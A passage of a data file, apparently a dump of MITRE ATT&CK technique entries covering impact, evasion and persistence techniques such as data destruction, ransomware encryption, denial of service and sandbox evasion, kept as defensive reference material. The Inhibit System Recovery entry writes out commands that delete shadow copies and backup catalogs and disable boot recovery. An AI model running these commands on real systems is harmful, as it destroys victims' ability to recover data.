                          'Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO '
                          'Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) '
                          'Since GPOs can control so many user and machine settings in the AD environment, there are a '
                          'great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide '
                          'to GPOs)\n'
                          '\n'
                          'For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be '
                          'leveraged to automate the creation of a malicious [Scheduled '
                          'Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this '
                          'case modifying '
                          '<code>&lt;GPO_PATH&gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml</code>.(Citation: '
                          'Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary '
                          'might modify specific user rights like SeEnableDelegationPrivilege, set in '
                          '<code>&lt;GPO_PATH&gt;\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf</code>, to '
                          'achieve a subtle AD backdoor with complete control of the domain because the user account '
                          "under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y "
                          'SeEnableDelegationPrivilege Right)\n',
           'name': 'Group Policy Modification',
           'platforms': ['Windows']},
 'T1485': {'attack_id': 'T1485',
           'categories': ['impact'],
           'description': 'Adversaries may destroy data and files on specific systems or in large numbers on a network '
                          'to interrupt availability to systems, services, and network resources. Data destruction is '
                          'likely to render stored data irrecoverable by forensic techniques through overwriting files '
                          'or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye '
                          'Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill '
                          '2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common '
                          'operating system file deletion commands such as <code>del</code> and <code>rm</code> often '
                          'only remove pointers to files without wiping the contents of the files themselves, making '
                          'the files recoverable by proper forensic methodology. This behavior is distinct from [Disk '
                          'Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure '
                          'Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed '
                          "rather than sections of a storage disk or the disk's logical structure.\n"
                          '\n'
                          'Adversaries may attempt to overwrite files and directories with randomly generated data to '
                          'make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 '
                          '2018) In some cases politically oriented image files have been used to overwrite '
                          'data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                          'Kaspersky StoneDrill 2017)\n'
                          '\n'
                          'To maximize impact on the target organization in operations where network-wide availability '
                          'interruption is the goal, malware designed for destroying data may have worm-like features '
                          'to propagate across a network by leveraging additional techniques like [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                          'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon '
                          '2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: '
                          'Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)',
           'name': 'Data Destruction',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1486': {'attack_id': 'T1486',
           'categories': ['impact'],
           'description': 'Adversaries may encrypt data on target systems or on large numbers of systems in a network '
                          'to interrupt availability to system and network resources. They can attempt to render '
                          'stored data inaccessible by encrypting files or data on local and remote drives and '
                          'withholding access to a decryption key. This may be done in order to extract monetary '
                          'compensation from a victim in exchange for decryption or a decryption key (ransomware) or '
                          'to render data permanently inaccessible in cases where the key is not saved or '
                          'transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: '
                          'US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is '
                          'typical that common user files like Office documents, PDFs, images, videos, audio, text, '
                          'and source code files will be encrypted. In some cases, adversaries may encrypt critical '
                          'system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n'
                          '\n'
                          'To maximize impact on the target organization, malware designed for encrypting data may '
                          'have worm-like features to propagate across a network by leveraging other attack techniques '
                          'like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                          'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry '
                          '2017)(Citation: US-CERT NotPetya 2017)',
           'name': 'Data Encrypted for Impact',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1489': {'attack_id': 'T1489',
           'categories': ['impact'],
           'description': 'Adversaries may stop or disable services on a system to render those services unavailable '
                          'to legitimate users. Stopping critical services can inhibit or stop response to an incident '
                          "or aid in the adversary's overall objectives to cause damage to the environment.(Citation: "
                          'Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n'
                          '\n'
                          'Adversaries may accomplish this by disabling individual services of high importance to an '
                          'organization, such as <code>MSExchangeIS</code>, which will make Exchange content '
                          'inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or '
                          'disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer '
                          '2018) Services may not allow for modification of their data stores while running. '
                          'Adversaries may stop services in order to conduct [Data '
                          'Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for '
                          'Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like '
                          'Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)',
           'name': 'Service Stop',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1490': {'attack_id': 'T1490',
           'categories': ['impact'],
           'description': 'Adversaries may delete or remove built-in operating system data and turn off services '
                          'designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos '
                          'Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain '
                          'features that can help fix corrupted systems, such as a backup catalog, volume shadow '
                          'copies, and automatic repair features. Adversaries may disable or delete system recovery '
                          'features to augment the effects of [Data '
                          'Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for '
                          'Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer '
                          '2018)(Citation: FireEye WannaCry 2017)\n'
                          '\n'
                          'A number of native Windows utilities have been used by adversaries to disable or delete '
                          'system recovery features:\n'
                          '\n'
                          '* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - '
                          '<code>vssadmin.exe delete shadows /all /quiet</code>\n'
                          '* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be '
                          'used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n'
                          '* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - '
                          '<code>wbadmin.exe delete catalog -quiet</code>\n'
                          '* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by '
                          'modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy '
                          'ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>',
           'name': 'Inhibit System Recovery',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1491': {'attack_id': 'T1491',
           'categories': ['impact'],
           'description': 'Adversaries may modify visual content available internally or externally to an enterprise '
                          'network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include '
                          'delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. '
                          'Disturbing or offensive images may be used as a part of '
                          '[Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, '
                          'or to pressure compliance with accompanying messages. \n',
           'name': 'Defacement',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1491.001': {'attack_id': 'T1491.001',
               'categories': ['impact'],
               'description': 'An adversary may deface systems internal to an organization in an attempt to intimidate '
                              'or mislead users. This may take the form of modifications to internal websites, or '
                              'directly to user systems with the replacement of the desktop wallpaper.(Citation: '
                              'Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal '
                              'Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user '
                              'discomfort, or to pressure compliance with accompanying messages. Since internally '
                              "defacing systems exposes an adversary's presence, it often takes place after other "
                              'intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive '
                              'Malware)',
               'name': 'Internal Defacement',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1491.002': {'attack_id': 'T1491.002',
               'categories': ['impact'],
               'description': 'An adversary may deface systems external to an organization in an attempt to deliver '
                              'messaging, intimidate, or otherwise mislead an organization or users. Externally-facing '
                              'websites are a common victim of defacement; often targeted by adversary and hacktivist '
                              'groups in order to push a political message or spread propaganda.(Citation: FireEye '
                              'Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate '
                              'Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) '
                              '[External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a '
                              'catalyst to trigger events, or as a response to actions taken by an organization or '
                              'government. Similarly, website defacement may also be used as setup, or a precursor, '
                              'for future attacks such as [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive '
                              'Into Defacement)',
               'name': 'External Defacement',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1495': {'attack_id': 'T1495',
           'categories': ['impact'],
           'description': 'Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other '
                          'firmware in devices attached to a system in order to render them inoperable or unable to '
                          'boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and '
                          'executed from non-volatile memory on hardware devices in order to initialize and manage '
                          'device functionality. These devices could include the motherboard, hard drive, or video '
                          'cards.',
           'name': 'Firmware Corruption',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1496': {'attack_id': 'T1496',
           'categories': ['impact'],
           'description': 'Adversaries may leverage the resources of co-opted systems in order to solve resource '
                          'intensive problems which may impact system and/or hosted service availability. \n'
                          '\n'
                          'One common purpose for Resource Hijacking is to validate transactions of cryptocurrency '
                          'networks and earn virtual currency. Adversaries may consume enough system resources to '
                          'negatively impact and/or cause affected machines to become unresponsive.(Citation: '
                          'Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - '
                          'Unused AWS Regions) systems are common targets because of the high potential for available '
                          'resources, but user endpoint systems may also be compromised and used for Resource '
                          'Hijacking and cryptocurrency mining.',
           'name': 'Resource Hijacking',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1497': {'attack_id': 'T1497',
           'categories': ['defense-evasion', 'discovery'],
           'description': 'Adversaries may employ various means to detect and avoid virtualization and analysis '
                          'environments. This may include changing behaviors based on the results of checks for the '
                          'presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the '
                          'adversary detects a VME, they may alter their malware to disengage from the victim or '
                          'conceal the core functions of the implant. They may also search for VME artifacts before '
                          'dropping secondary or additional payloads. Adversaries may use the information learned from '
                          '[Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during '
                          'automated discovery to shape follow-on behaviors. \n'
                          '\n'
                          'Adversaries may use several methods to accomplish [Virtualization/Sandbox '
                          'Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security '
                          'monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated '
                          'with analysis or virtualization. Adversaries may also check for legitimate user activity to '
                          'help determine if it is in an analysis environment. Additional methods include use of sleep '
                          'timers or loops within malware code to avoid operating within a temporary '
                          'sandbox.(Citation: Unit 42 Pirpi July 2015)\n'
                          '\n',
           'name': 'Virtualization/Sandbox Evasion',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1497.001': {'attack_id': 'T1497.001',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various system checks to detect and avoid virtualization and '
                              'analysis environments. This may include changing behaviors based on the results of '
                              'checks for the presence of artifacts indicative of a virtual machine environment (VME) '
                              'or sandbox. If the adversary detects a VME, they may alter their malware to disengage '
                              'from the victim or conceal the core functions of the implant. They may also search for '
                              'VME artifacts before dropping secondary or additional payloads. Adversaries may use the '
                              'information learned from [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape '
                              'follow-on behaviors. \n'
                              '\n'
                              'Specific checks may will vary based on the target and/or adversary, but may involve '
                              'behaviors such as [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047), '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information '
                              'Discovery](https://attack.mitre.org/techniques/T1082), and [Query '
                              'Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and '
                              'search for VME artifacts. Adversaries may search for VME artifacts in memory, '
                              'processes, file system, hardware, and/or the Registry. Adversaries may use scripting to '
                              'automate these checks  into one script and then have the program exit if it determines '
                              'the system to be a virtual environment. \n'
                              '\n'
                              'Checks could include generic system properties such as uptime and samples of network '
                              'traffic. Adversaries may also check the network adapters addresses, CPU core count, and '
                              'available memory/drive size. \n'
                              '\n'
                              'Other common checks may enumerate services running that are unique to these '
                              'applications, installed programs on the system, manufacturer/product fields for strings '
                              'relating to virtual machine applications, and VME-specific hardware/processor '
                              'instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, '
                              'adversaries can also use a special I/O port to send commands and receive output. \n'
                              ' \n'
                              'Hardware checks, such as the presence of the fan, temperature, and audio devices, could '
                              'also be used to gather evidence that can be indicative a virtual environment. '
                              'Adversaries may also query for specific readings from these devices.(Citation: Unit 42 '
                              'OilRig Sept 2018)',
               'name': 'System Checks',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1497.002': {'attack_id': 'T1497.002',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various user activity checks to detect and avoid virtualization '
                              'and analysis environments. This may include changing behaviors based on the results of '
                              'checks for the presence of artifacts indicative of a virtual machine environment (VME) '
                              'or sandbox. If the adversary detects a VME, they may alter their malware to disengage '
                              'from the victim or conceal the core functions of the implant. They may also search for '
                              'VME artifacts before dropping secondary or additional payloads. Adversaries may use the '
                              'information learned from [Virtualization/Sandbox '
                              'Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape '
                              'follow-on behaviors. \n'
                              '\n'
                              'Adversaries may search for user activity on the host based on variables such as the '
                              'speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , '
                              'browser history, cache, bookmarks, or number of files in common directories such as '
                              'home or the desktop. Other methods may rely on specific user interaction with the '
                              'system before the malicious code is activated, such as waiting for a document to close '
                              'before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to '
                              'double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ',
               'name': 'User Activity Based Checks',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1497.003': {'attack_id': 'T1497.003',
               'categories': ['defense-evasion', 'discovery'],
               'description': 'Adversaries may employ various time-based methods to detect and avoid virtualization '
                              'and analysis environments. This may include timers or other triggers to avoid a virtual '
                              'machine environment (VME) or sandbox, specifically those that are automated or only '
                              'operate for a limited amount of time.\n'
                              '\n'
                              'Adversaries may employ various time-based evasions, such as delaying malware '
                              'functionality upon initial execution using programmatic sleep commands or native system '
                              'scheduling functionality (ex: [Scheduled '
                              'Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on '
                              'waiting for specific victim conditions to be met (ex: system time, events, etc.) or '
                              'employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to '
                              'avoid analysis and scrutiny. ',
               'name': 'Time Based Evasion',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1498': {'attack_id': 'T1498',
           'categories': ['impact'],
           'description': 'Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the '
                          'availability of targeted resources to users. Network DoS can be performed by exhausting the '
                          'network bandwidth services rely on. Example resources include specific websites, email '
                          'services, DNS, and web-based applications. Adversaries have been observed conducting '
                          'network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February '
                          '2016) and to support other malicious activities, including distraction(Citation: FSISAC '
                          'FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October '
                          '2014)\n'
                          '\n'
                          'A Network DoS will occur when the bandwidth capacity of the network connection to a system '
                          'is exhausted due to the volume of malicious traffic directed at the resource or the network '
                          'connections and network devices the resource relies on. For example, an adversary may send '
                          '10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the '
                          'internet. This traffic can be generated by a single system or multiple systems spread '
                          'across the internet, which is commonly referred to as a distributed DoS (DDoS).\n'
                          '\n'
                          'To perform Network DoS attacks several aspects apply to multiple methods, including IP '
                          'address spoofing, and botnets.\n'
                          '\n'
                          'Adversaries may use the original IP address of an attacking system, or spoof the source IP '
                          'address to make the attack traffic more difficult to trace back to the attacking system or '
                          'to enable reflection. This can increase the difficulty defenders have in defending against '
                          'the attack by reducing or eliminating the effectiveness of filtering by the source address '
                          'on network defense devices.\n'
                          '\n'
                          'For DoS attacks targeting the hosting system directly, see [Endpoint Denial of '
                          'Service](https://attack.mitre.org/techniques/T1499).',
           'name': 'Network Denial of Service',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure AD', 'SaaS', 'Azure', 'Office 365']},
 'T1498.001': {'attack_id': 'T1498.001',
               'categories': ['impact'],
               'description': 'Adversaries may attempt to cause a denial of service (DoS) by directly sending a '
                              'high-volume of network traffic to a target. [Direct Network '
                              'Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are '
                              "used to send a high-volume of network packets towards the targeted service's network. "
                              'Almost any network protocol may be used for flooding. Stateless protocols such as UDP '
                              'or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n'
                              '\n'
                              'Botnets are commonly used to conduct network flooding attacks against networks and '
                              'services. Large botnets can generate a significant amount of traffic from systems '
                              'spread across the global Internet. Adversaries may have the resources to build out and '
                              'control their own botnet infrastructure or may rent time on an existing botnet to '
                              'conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many '
                              'systems are used to generate the flood that each one only needs to send out a small '
                              'amount of traffic to produce enough volume to saturate the target network. In such '
                              'circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly '
                              'difficult. Botnets have been used in some of the most high-profile DDoS flooding '
                              'attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: '
                              'USNYAG IranianBotnet March 2016)',
               'name': 'Direct Network Flood',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure AD', 'SaaS', 'Azure', 'Office 365']},
 'T1498.002': {'attack_id': 'T1498.002',
               'categories': ['impact'],
               'description': 'Adversaries may attempt to cause a denial of service by reflecting a high-volume of '
                              'network traffic to a target. This type of Network DoS takes advantage of a third-party '
                              'server intermediary that hosts and will respond to a given spoofed source IP address. '
                              'This third-party server is commonly termed a reflector. An adversary accomplishes a '
                              'reflection attack by sending packets to reflectors with the spoofed address of the '
                              'victim. Similar to Direct Network Floods, more than one system may be used to conduct '
                              'the attack, or a botnet may be used. Likewise, one or more reflector may be used to '
                              'focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n'
                              '\n'
                              'Reflection attacks often take advantage of protocols with larger responses than '
                              'requests in order to amplify their traffic, commonly known as a Reflection '
                              'Amplification attack. Adversaries may be able to generate an increase in volume of '
                              'attack traffic that is several orders of magnitude greater than the requests sent to '
                              'the amplifiers. The extent of this increase will depending upon many variables, such as '
                              'the protocol in question, the technique used, and the amplifying servers that actually '
                              'produce the amplification in attack volume. Two prominent protocols that have enabled '
                              'Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and '
                              'NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the '
                              'wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, '
                              'the memcache protocol showed itself to be a powerful protocol, with amplification sizes '
                              'up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)',
               'name': 'Reflection Amplification',
               'platforms': ['macOS', 'Windows', 'Linux', 'AWS', 'Office 365', 'Azure AD', 'GCP', 'Azure', 'SaaS']},
 'T1499': {'attack_id': 'T1499',
           'categories': ['impact'],
           'description': 'Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the '
                          'availability of services to users. Endpoint DoS can be performed by exhausting the system '
                          'resources those services are hosted on or exploiting the system to cause a persistent crash '
                          'condition. Example services include websites, email services, DNS, and web-based '
                          'applications. Adversaries have been observed conducting DoS attacks for political '
                          'purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious '
                          'activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, '
                          'and extortion.(Citation: Symantec DDoS October 2014)\n'
                          '\n'
                          'An Endpoint DoS denies the availability of a service without saturating the network used to '
                          'provide access to the service. Adversaries can target various layers of the application '
                          'stack that is hosted on the system used to provide the service. These layers include the '
                          'Operating Systems (OS), server applications such as web servers, DNS servers, databases, '
                          'and the (typically web-based) applications that sit on top of them. Attacking each layer '
                          'requires different techniques that take advantage of bottlenecks that are unique to the '
                          'respective components. A DoS attack may be generated by a single system or multiple systems '
                          'spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n'
                          '\n'
                          'To perform DoS attacks against endpoint resources, several aspects apply to multiple '
                          'methods, including IP address spoofing and botnets.\n'
                          '\n'
                          'Adversaries may use the original IP address of an attacking system, or spoof the source IP '
                          'address to make the attack traffic more difficult to trace back to the attacking system or '
                          'to enable reflection. This can increase the difficulty defenders have in defending against '
                          'the attack by reducing or eliminating the effectiveness of filtering by the source address '
                          'on network defense devices.\n'
                          '\n'
                          'Botnets are commonly used to conduct DDoS attacks against networks and services. Large '
                          'botnets can generate a significant amount of traffic from systems spread across the global '
                          'internet. Adversaries may have the resources to build out and control their own botnet '
                          'infrastructure or may rent time on an existing botnet to conduct an attack. In some of the '
                          'worst cases for DDoS, so many systems are used to generate requests that each one only '
                          'needs to send out a small amount of traffic to produce enough volume to exhaust the '
                          "target's resources. In such circumstances, distinguishing DDoS traffic from legitimate "
                          'clients becomes exceedingly difficult. Botnets have been used in some of the most '
                          'high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US '
                          'banks.(Citation: USNYAG IranianBotnet March 2016)\n'
                          '\n'
                          'In cases where traffic manipulation is used, there may be points in the the global network '
                          '(such as high traffic gateway routers) where packets can be altered and cause legitimate '
                          'clients to execute code that directs network packets toward a target in high volume. This '
                          'type of capability was previously used for the purposes of web censorship where client HTTP '
                          'traffic was modified to include a reference to JavaScript that generated the DDoS code to '
                          'overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n'
                          '\n'
                          'For attacks attempting to saturate the providing network, see [Network Denial of '
                          'Service](https://attack.mitre.org/techniques/T1498).\n',
           'name': 'Endpoint Denial of Service',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1499.001': {'attack_id': 'T1499.001',
               'categories': ['impact'],
               'description': 'Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is '
                              'responsible for managing the finite resources on a system. These attacks do not need to '
                              'exhaust the actual resources on a system since they can simply exhaust the limits that '
                              'an OS self-imposes to prevent the entire system from being overwhelmed by excessive '
                              'demands on its capacity.\n'
                              '\n'
                              'Different ways to achieve this exist, including TCP state-exhaustion attacks such as '
                              'SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, '
                              'excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never '
                              'completed. Because each OS has a maximum number of concurrent TCP connections that it '
                              'will allow, this can quickly exhaust the ability of the system to receive new requests '
                              'for TCP connections, thus preventing access to any TCP service provided by the '
                              'server.(Citation: Cloudflare SynFlood)\n'
                              '\n'
                              'ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are '
                              'sent to the target. This forces the OS to search its state table for a related TCP '
                              'connection that has already been established. Because the ACK packets are for '
                              'connections that do not exist, the OS will have to search the entire state table to '
                              'confirm that no match exists. When it is necessary to do this for a large flood of '
                              'packets, the computational requirements can cause the server to become sluggish and/or '
                              'unresponsive, due to the work it must do to eliminate the rogue ACK packets. This '
                              'greatly reduces the resources available for providing the targeted service.(Citation: '
                              'Corero SYN-ACKflood)',
               'name': 'OS Exhaustion Flood',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1499.002': {'attack_id': 'T1499.002',
               'categories': ['impact'],
               'description': 'Adversaries may target the different network services provided by systems to conduct a '
                              'DoS. Adversaries often target DNS and web services, however others have been targeted '
                              'as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked '
                              'through a variety of means, some of which apply generally while others are specific to '
                              'the software being used to provide the service.\n'
                              '\n'
                              'One example of this type of attack is known as a simple HTTP flood, where an adversary '
                              'sends a large number of HTTP requests to a web server to overwhelm it and/or an '
                              'application that runs on top of it. This flood relies on raw volume to accomplish the '
                              'objective, exhausting any of the various resources required by the victim software to '
                              'provide the service.(Citation: Cloudflare HTTPflood)\n'
                              '\n'
                              'Another variation, known as a SSL renegotiation attack, takes advantage of a protocol '
                              'feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and '
                              'server to agree on an encryption algorithm to use for subsequent secure connections. If '
                              'SSL renegotiation is enabled, a request can be made for renegotiation of the crypto '
                              'algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection '
                              'and then proceeds to make a series of renegotiation requests. Because the cryptographic '
                              'renegotiation has a meaningful cost in computation cycles, this can cause an impact to '
                              'the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)',
               'name': 'Service Exhaustion Flood',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1499.003': {'attack_id': 'T1499.003',
               'categories': ['impact'],
               'description': 'Adversaries may target resource intensive features of web applications to cause a '
                              'denial of service (DoS). Specific features in web applications may be highly resource '
                              'intensive. Repeated requests to those features may be able to exhaust system resources '
                              'and deny access to the application or the server itself. (Citation: Arbor '
                              'AnnualDoSreport Jan 2018)',
               'name': 'Application Exhaustion Flood',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1499.004': {'attack_id': 'T1499.004',
               'categories': ['impact'],
               'description': 'Adversaries may exploit software vulnerabilities that can cause an application or '
                              'system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) '
                              'Some systems may automatically restart critical applications and services when crashes '
                              'occur, but they can likely be re-exploited to cause a persistent DoS condition.',
               'name': 'Application or System Exploitation',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1505': {'attack_id': 'T1505',
           'categories': ['persistence'],
           'description': 'Adversaries may abuse legitimate extensible development features of servers to establish '
                          'persistent access to systems. Enterprise server applications may include features that '
                          'allow developers to write and install software or scripts to extend the functionality of '
                          'the main application. Adversaries may install malicious components to extend and abuse '
                          'server applications.',
           'name': 'Server Software Component',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1505.001': {'attack_id': 'T1505.001',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse SQL stored procedures to establish persistent access to systems. '
                              'SQL Stored Procedures are code that can be saved and reused so that database users do '
                              'not waste time rewriting frequently used SQL queries. Stored procedures can be invoked '
                              'via SQL statements to the database using the procedure name or via defined events (e.g. '
                              'when a SQL server application is started/restarted).\n'
                              '\n'
                              'Adversaries may craft malicious stored procedures that can provide a persistence '
                              'mechanism in SQL database servers.(Citation: NetSPI Startup Stored '
                              'Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands '
                              'through SQL syntax the adversary may have to enable additional functionality, such as '
                              'xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: '
                              'Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n'
                              '\n'
                              'Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR '
                              'integration enabled, application developers can write stored procedures using any .NET '
                              'framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) '
                              'Adversaries may craft or modify CLR assemblies that are linked to stored procedures '
                              'since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI '
                              'SQL Server CLR) ',
               'name': 'SQL Stored Procedures',
               'platforms': ['Windows', 'Linux']},
 'T1505.002': {'attack_id': 'T1505.002',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft transport agents to establish persistent access to '
                              'systems. Microsoft Exchange transport agents can operate on email messages passing '
                              'through the transport pipeline to perform various tasks such as filtering spam, '
                              'filtering malicious attachments, journaling, or adding a corporate signature to the end '
                              'of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET '
                              'LightNeuron May 2019) Transport agents can be written by application developers and '
                              'then compiled to .NET assemblies that are subsequently registered with the Exchange '
                              'server. Transport agents will be invoked during a specified stage of email processing '
                              'and carry out developer defined tasks. \n'
                              '\n'
                              'Adversaries may register a malicious transport agent to provide a persistence mechanism '
                              'in Exchange Server that can be triggered by adversary-specified email events.(Citation: '
                              'ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all '
                              'emails passing through the Exchange transport pipeline, the agent can be configured to '
                              'only carry out specific tasks in response to adversary defined criteria. For example, '
                              'the transport agent may only carry out an action like copying in-transit attachments '
                              'and saving them for later exfiltration if the recipient email address matches an entry '
                              'on a list provided by the adversary. ',
               'name': 'Transport Agent',
               'platforms': ['Linux', 'Windows']},
 'T1505.003': {'attack_id': 'T1505.003',
               'categories': ['persistence'],
